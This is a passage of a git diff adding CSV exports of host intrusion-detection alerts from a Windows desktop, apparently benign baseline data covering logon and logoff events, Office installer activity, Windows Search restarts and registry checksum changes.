+ Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:24:05.276",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:23:47.724",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:23:47.354",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '46cb3bdf23ef43d6ce23972203d529f7' +New md5sum is : '1c4e04d793df8bd371434698d7441beb' +Old sha1sum was: '267432bd00d7bec5d1d2a096cd54f7c3993d8873' +New sha1sum is : '445eb561728c2ed4b3dc1e1f8173bdf8acae870c' +", diff --git a/data/NULLTEST_HIDS_3.csv b/data/NULLTEST_HIDS_3.csv new file mode 100644 index 0000000..f3aa542 --- /dev/null +++ b/data/NULLTEST_HIDS_3.csv @@ -0,0 +1,1313 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log" +"May 22, 2020 @ 15:17:37.286",3,"Windows installer reconfigured the product","""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Licensing Component. Product Version: 16.0.12730.20270. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""", +"May 22, 2020 @ 15:17:35.865",3,"Windows Installer began an installation process","""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\sppredist.msi. Client Process Id: 6728.""", +"May 22, 2020 @ 15:17:35.817",3,"Windows installer reconfigured the product","""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Localization Component. Product Version: 16.0.12730.20206. Product Language: 1033. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""", +"May 22, 2020 @ 15:17:35.676",3,"Windows Installer began an installation process","""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rintloc.en-us.16.msi. Client Process Id: 6728.""", +"May 22, 2020 @ 15:17:35.630",3,"Windows installer reconfigured the product","""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Extensibility Component. Product Version: 16.0.12730.20206. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""", +"May 22, 2020 @ 15:17:35.349",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:17:34.567",3,"The Windows Search Service started","""The Windows Search Service started. +""", +"May 22, 2020 @ 15:17:34.442",3,"The database engine attached a database","""SearchIndexer (5516,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000015:0046:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000258 +J(0) +M(C:0K, Fs:26, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.006118 -0.001011 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:39, WS:120K # 0K, PF:144K # 0K, P:144K) +[4] 0.000155 +J(0) +[5] - +[6] - +[7] - +[8] 0.003427 -0.000845 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:51, WS:200K # 0K, PF:644K # 0K, P:644K) +[9] 0.012463 -0.000284 (5) CM -0.011993 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 112K, P:256K) +[10] 0.000322 -0.000172 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 0K, PF:96K # 96K, P:96K) +[11] 0.000013 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 8K, PF:0K # 0K, P:0K) +[12] 0.000032 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""", +"May 22, 2020 @ 15:17:34.379",3,"The database engine is starting a new instance","""SearchIndexer (5516,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""", +"May 22, 2020 @ 15:17:34.286",3,"Windows Installer began an installation process","""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rint.16.msi. Client Process Id: 6728.""", +"May 22, 2020 @ 15:17:30.990",3,"The Windows Search Service stopped normally","""Windows Search Service stopped normally. +""", +"May 22, 2020 @ 15:17:30.959",5,"The database engine stopped an instance","""SearchIndexer (716,T,97) Windows: The database engine stopped the instance (0). + +Dirty Shutdown: 0 + +Internal Timing Sequence: +[1] 0.000002 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000011 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[3] 0.000226 +J(CM:1, PgRf:15, Rd:0/1, Dy:3/17, Lg:590/15) +[4] 0.000004 +J(0) +[5] 0.021433 -0.000012 (54) CM -0.019747 (8) WT +J(CM:54, PgRf:0, Rd:0/54, Dy:0/0, Lg:0/0) +M(C:0K, Fs:331, WS:12K # 0K, PF:4K # 0K, P:4K) +[6] 0.002899 +J(0) +M(C:0K, Fs:1, WS:-6716K # 0K, PF:-6616K # 0K, P:-6616K) +[7] 0.000012 +J(0) +[8] 0.005098 -0.002884 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:2113/2) +M(C:0K, Fs:23, WS:-180K # 0K, PF:-1092K # 0K, P:-1092K) +[9] 0.000434 -0.000391 (1) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:66/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[10] 0.000004 +J(0) +[11] 0.001158 -0.000551 (2) WT +J(0) +[12] 0.000038 +J(0) +M(C:0K, Fs:0, WS:-4K # 0K, PF:-4K # 0K, P:-4K) +[13] 0.000224 +J(0) +M(C:0K, Fs:0, WS:0K # 0K, PF:16K # 0K, P:16K) +[14] 0.000067 +J(0) +M(C:0K, Fs:0, WS:-164K # 0K, PF:-176K # 0K, P:-176K) +[15] 0.000005 +J(0).""", +"May 22, 2020 @ 15:17:30.679",3,"Windows installer reconfigured the product","""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Extensibility Component. Product Version: 16.0.12730.20206. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""", +"May 22, 2020 @ 15:17:16.177",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:17:15.286",3,"Windows Installer began an installation process","""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rint.16.msi. Client Process Id: 6728.""", +"May 22, 2020 @ 15:17:07.630",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T15:12:06Z. Reason: RulesEngine.""", +"May 22, 2020 @ 15:16:51.458",3,"Service startup type was changed","""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""", +"May 22, 2020 @ 15:16:50.177",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '1c729912f87f9abbd1574176fc5996f7' +New md5sum is : '370914f65a755a1cbfcf0c873b11feaa' +Old sha1sum was: '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +New sha1sum is : 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +" +"May 22, 2020 @ 15:16:49.193",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:16:48.504",3,"The Windows Search Service started","""The Windows Search Service started. +""", +"May 22, 2020 @ 15:16:48.410",3,"The database engine attached a database","""SearchIndexer (716,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:003B:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000203 +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.004531 -0.001122 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:42, WS:128K # 0K, PF:152K # 0K, P:152K) +[4] 0.000091 +J(0) +[5] - +[6] - +[7] - +[8] 0.001911 -0.000749 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:51, WS:204K # 0K, PF:640K # 0K, P:640K) +[9] 0.011706 -0.000284 (5) CM -0.011199 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 120K, P:256K) +[10] 0.000229 -0.000140 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:12, WS:44K # 0K, PF:100K # 100K, P:100K) +[11] 0.000011 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 12K, PF:0K # 0K, P:0K) +[12] 0.000031 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000003 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""", +"May 22, 2020 @ 15:16:48.301",3,"The database engine is starting a new instance","""SearchIndexer (716,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""", +"May 22, 2020 @ 15:16:47.708",3,"The Windows Search Service stopped normally","""Windows Search Service stopped normally. +""", +"May 22, 2020 @ 15:16:47.692",5,"The database engine stopped an instance","""SearchIndexer (4592,T,97) Windows: The database engine stopped the instance (0). + +Dirty Shutdown: 0 + +Internal Timing Sequence: +[1] 0.000008 +J(0) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[2] 0.000021 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[3] 0.000739 -0.000529 (1) CM +J(CM:1, PgRf:10, Rd:0/0, Dy:0/10, Lg:284/13) +M(C:0K, Fs:45, WS:180K # 0K, PF:8K # 0K, P:8K) +[4] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[5] 0.051269 -0.000006 (22) CM -0.036427 (7) WT +J(CM:22, PgRf:0, Rd:0/22, Dy:0/0, Lg:0/0) +M(C:0K, Fs:185, WS:304K # 0K, PF:8K # 0K, P:8K) +[6] 0.001413 +J(0) +M(C:0K, Fs:1, WS:-1216K # 0K, PF:-3016K # 0K, P:-3016K) +[7] 0.000018 +J(0) +[8] 0.010167 -0.007266 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3664/2) +M(C:0K, Fs:29, WS:16K # 0K, PF:84K # 0K, P:84K) +[9] 0.000427 -0.000384 (1) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:66/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[10] 0.000004 +J(0) +[11] 0.001435 -0.000592 (2) WT +J(0) +[12] 0.000051 +J(0) +M(C:0K, Fs:0, WS:-4K # 0K, PF:-4K # 0K, P:-4K) +[13] 0.000204 +J(0) +[14] 0.000056 +J(0) +M(C:0K, Fs:0, WS:-68K # 0K, PF:-72K # 0K, P:-72K) +[15] 0.000009 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K).""", +"May 22, 2020 @ 15:15:09.550",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T15:12:08Z. Reason: RulesEngine.""", +"May 22, 2020 @ 15:14:46.191",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:14:41.113",3,"Windows Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:14:25.082",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'b187c4a14d4a0fc8b255a5e6dc68e1b1' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : 'd35485293b6324039fb84a913c4ac605c9050f4a' +" +"May 22, 2020 @ 15:14:25.065",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '737129e2f8cfe11a96ca093d49dee7f2' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '559d4974169b9c45d6f345deb22f6aeee8abefa8' +" +"May 22, 2020 @ 15:13:35.439",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T15:12:32Z. Reason: RulesEngine.""", +"May 22, 2020 @ 15:13:23.826",3,"Windows User Logoff","""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB464E + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""", +"May 22, 2020 @ 15:13:23.784",3,"Windows User Logoff","""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB466D + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""", +"May 22, 2020 @ 15:13:23.736",3,"Windows Workstation Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB466D + Linked Logon ID: 0xB464E + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x110 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:13:23.706",3,"Windows Workstation Logon Success","""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB464E + Linked Logon ID: 0xB466D + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x110 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the 